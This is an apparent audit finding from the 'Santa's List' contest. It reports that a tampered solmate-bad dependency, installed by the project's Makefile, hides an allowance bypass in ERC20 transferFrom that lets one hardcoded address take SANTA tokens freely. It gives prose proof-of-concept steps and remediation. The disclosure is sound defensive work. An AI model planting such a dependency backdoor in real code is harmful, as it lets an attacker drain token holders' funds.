First Flight #5: Santa's List

Summary

Malicious contract library (solmate-bad) allows malicious actor to mint entire supply of SANTA tokens using ERC20's TransferFrom function

Vulnerability Details

The protocol's Makefile installs solmate-bad from a location (patrickalphac/solmate-bad) provided by a malicious actor. Within the ERC20.sol contract's TransferFrom() function, there is code which allows a specific calling address to obtain SANTA tokens for themselves or another address without checking an allowance and without deducting from the victim's ("from" address) balance. This is effectively minting SANTA tokens to the "to" address. This vulnerability can be exploited any number of times since the victim's balance is never reduced.

Impact

High

PoC

In Foundry test file, add two users - thief and patsy.
In an existing test, add "console.log("thief: ", thief);' and execute that test (with -vv) and you will be able to obtain the address for thief.
Remove the console.log line from your test.

Modify the malicious ERC20.sol's TransferFrom function to use the address of thief instead of 0x815F577F1c1bcE213c012f166744937C889DAF17

Now execute the following Foundry test, which will fail due to not reverting when executed...

Tools Used

Visual Studio Code, Foundry

Recommendations

1. Remove the malicious solmate-bad library from the /libs folder

2. Install the correct solmate library: forge install transmissions11/solmate --no-commit

3. Modify the Makefile to install solmate from the correct location

4. Modify the foundry.toml file with correct mapping for @solmate

5. Rebuild the solution

6. Re-run above test, it should pass